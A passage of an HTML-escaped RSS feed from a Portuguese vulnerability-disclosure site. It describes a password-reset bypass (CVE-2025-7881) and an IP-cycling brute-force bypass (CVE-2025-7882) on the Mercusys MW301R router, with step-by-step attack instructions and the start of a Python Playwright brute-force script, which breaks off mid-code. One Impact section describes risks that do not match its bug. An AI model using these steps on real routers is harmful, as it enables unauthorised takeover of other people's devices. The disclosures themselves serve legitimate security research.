    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7871.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7881</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7881/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7881/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7881-bypass-de-autenticação-na-redefinição-de-senha&amp;#34;&amp;gt;CVE-2025-7881: Bypass de Autenticação na Redefinição de Senha
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7881&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7881&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Em sessões autenticadas, é possível ignorar completamente o fluxo de trabalho de alteração de senha sem saber a senha atual do administrador. No Mercusys MW301R, o método oficial de recuperação de uma senha esquecida é realizar uma redefinição de fábrica — o que requer acesso físico — ou, em uma sessão válida, fornecer a senha existente. O bypass descoberto permite que um invasor já autenticado intercepte a solicitação HTTP e simplesmente modifique o parâmetro de código para invocar o endpoint de redefinição diretamente. Isso permite que a senha do administrador seja alterada remotamente, sem qualquer interação física com o dispositivo ou conhecimento da credencial anterior.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7881-bypass-de-autenticação-na-redefinição-de-senha&amp;#34;&amp;gt;CVE-2025-7881: Bypass de Autenticação na Redefinição de Senha
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7881&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7881&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Em sessões autenticadas, é possível ignorar completamente o fluxo de trabalho de alteração de senha sem saber a senha atual do administrador. No Mercusys MW301R, o método oficial de recuperação de uma senha esquecida é realizar uma redefinição de fábrica — o que requer acesso físico — ou, em uma sessão válida, fornecer a senha existente. O bypass descoberto permite que um invasor já autenticado intercepte a solicitação HTTP e simplesmente modifique o parâmetro de código para invocar o endpoint de redefinição diretamente. Isso permite que a senha do administrador seja alterada remotamente, sem qualquer interação física com o dispositivo ou conhecimento da credencial anterior.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ol&amp;gt;
&amp;lt;li&amp;gt;
Acesse a interface web do roteador navegando até &amp;lt;code&amp;gt;http://192.168.1.1/&amp;lt;/code&amp;gt; e efetue login com a senha de administrador.
&amp;lt;br /&amp;gt;&amp;lt;strong&amp;gt;Observação:&amp;lt;/strong&amp;gt; Se a senha for esquecida, o único método de recuperação é uma redefinição de fábrica usando o botão físico Reset (mantenha-o pressionado até que todos os LEDs acendam).
&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;
Enquanto estiver conectado, execute qualquer ação que acione uma solicitação POST com os parâmetros &amp;lt;code&amp;gt;code=&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;id=&amp;lt;/code&amp;gt; (por exemplo, keepalive ou verificação de status) e intercepte-a usando um proxy para capturar um ID de sessão válido.
&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;
Modifique a solicitação interceptada alterando &amp;lt;code&amp;gt;code=&amp;lt;/code&amp;gt; para &amp;lt;code&amp;gt;code=5&amp;lt;/code&amp;gt; e, em seguida, encaminhe a solicitação alterada para o roteador.
&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;
Atualize a página em &amp;lt;code&amp;gt;http://192.168.1.1/&amp;lt;/code&amp;gt; no seu navegador.
&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;
A interface agora solicitará uma nova senha sem solicitar a atual. Defina e confirme sua nova senha para redefini-la remotamente.
&amp;lt;/li&amp;gt;
&amp;lt;/ol&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7881/image.png&amp;#34;
	width=&amp;#34;1761&amp;#34;
	height=&amp;#34;914&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7881/image_hu_84851d9b3281fdd2.png 480w, /p/cve-2025-7881/image_hu_712ec8092b9c202e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7881/image-1.png&amp;#34;
	width=&amp;#34;1896&amp;#34;
	height=&amp;#34;950&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7881/image-1_hu_ffbdf451785a2336.png 480w, /p/cve-2025-7881/image-1_hu_b3e5565b00c0449f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;199&amp;#34;
		data-flex-basis=&amp;#34;478px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7881/image-2.png&amp;#34;
	width=&amp;#34;1743&amp;#34;
	height=&amp;#34;990&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7881/image-2_hu_b00c8f44d15ccd57.png 480w, /p/cve-2025-7881/image-2_hu_9492fbe60421903a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;176&amp;#34;
		data-flex-basis=&amp;#34;422px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7881/image-3.png&amp;#34;
	width=&amp;#34;1897&amp;#34;
	height=&amp;#34;948&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7881/image-3_hu_582f72308fd6f70c.png 480w, /p/cve-2025-7881/image-3_hu_bf92a9c54baec3b4.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;200&amp;#34;
		data-flex-basis=&amp;#34;480px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/-mlmTZ-3PzM&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/-mlmTZ-3PzM&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A falta de validação de sessão neste endpoint pode levar a vários riscos de segurança:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Exposição de Dados Não Autorizada:&amp;lt;/b&amp;gt; Usuários não autenticados podem enumerar ou recuperar dados internos confidenciais.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Escalonamento de Privilégios:&amp;lt;/b&amp;gt; Invasores podem acessar ou inferir informações destinadas apenas a usuários autorizados.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Divulgação de Informações:&amp;lt;/b&amp;gt; Lógica de negócios e IDs internos (como funções ou permissões de usuário) podem ser vazados.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Suporte de Reconhecimento:&amp;lt;/b&amp;gt; Facilita o mapeamento de estruturas de backend para ataques mais direcionados.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7881.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7881.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7882</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7882/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7882/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7882-bypass-de-força-bruta-via-ciclagem-de-ip&amp;#34;&amp;gt;CVE-2025-7882: Bypass de Força Bruta via Ciclagem de IP
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7882&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7882&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O roteador Mercusys MW301R implementa um mecanismo básico de proteção contra força bruta que bloqueia tentativas de login após um certo número de tentativas de login. Tentativas com falha. No entanto, esse mecanismo de bloqueio se baseia exclusivamente no endereço IP de origem, sem impor nenhuma impressão digital de sessão, validação de token ou limitação avançada de taxa e endereço MAC, etc.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7882-bypass-de-força-bruta-via-ciclagem-de-ip&amp;#34;&amp;gt;CVE-2025-7882: Bypass de Força Bruta via Ciclagem de IP
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7882&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7882&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O roteador Mercusys MW301R implementa um mecanismo básico de proteção contra força bruta que bloqueia tentativas de login após um certo número de tentativas de login. Tentativas com falha. No entanto, esse mecanismo de bloqueio se baseia exclusivamente no endereço IP de origem, sem impor nenhuma impressão digital de sessão, validação de token ou limitação avançada de taxa e endereço MAC, etc.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;/p&amp;gt;Um invasor conectado à LAN pode simplesmente alterar seu endereço IP local (por exemplo, de 192.168.1.10 para 192.168.1.11) após atingir o limite, zerando efetivamente o contador de tentativas de login.&amp;lt;/br&amp;gt; Isso permite que um ataque de força bruta seja realizado contra a página de login do administrador, anulando completamente o mecanismo de segurança pretendido.
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ol&amp;gt;
&amp;lt;li&amp;gt;
Conecte-se à mesma rede local que o roteador (gateway padrão: &amp;lt;code&amp;gt;192.168.1.1&amp;lt;/code&amp;gt;) para preparar o ambiente de ataque.
&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;
Inicie tentativas de login de força bruta enviando solicitações com valores de senha diferentes. Após algumas falhas, o roteador bloqueará novas tentativas a partir desse endereço IP.
&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;
Para contornar o bloqueio, altere o endereço IP do seu dispositivo para outro dentro da faixa permitida e continue o processo de força bruta a partir do novo IP.
&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;
Repita este processo — sempre que seu IP for bloqueado, alterne para outro IP entre &amp;lt;code&amp;gt;192.168.1.4&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;192.168.1.254&amp;lt;/code&amp;gt; e retome o ataque.
&amp;lt;/li&amp;gt;
&amp;lt;/ol&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;código-do-exploit&amp;#34;&amp;gt;Código do Exploit:
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;21
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;22
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;23
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-python&amp;#34; data-lang=&amp;#34;python&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;kn&amp;#34;&amp;gt;import&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nn&amp;#34;&amp;gt;time&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;kn&amp;#34;&amp;gt;from&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nn&amp;#34;&amp;gt;playwright.sync_api&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;kn&amp;#34;&amp;gt;import&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;sync_playwright&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;def&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nf&amp;#34;&amp;gt;carrega_senhas&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;caminho_arquivo&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;str&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;list&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;[&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;str&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;]:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;with&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;open&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;caminho_arquivo&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;r&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;encoding&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;utf-8&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;as&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;f&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;return&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;[&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;linha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;strip&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;for&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;linha&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;ow&amp;#34;&amp;gt;in&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;f&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;if&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;linha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;strip&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()]&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;def&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nf&amp;#34;&amp;gt;tenta_login&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;str&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;bool&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;goto&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;http://192.168.1.1/&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;get_by_role&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;textbox&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;name&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Senha de Login&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span 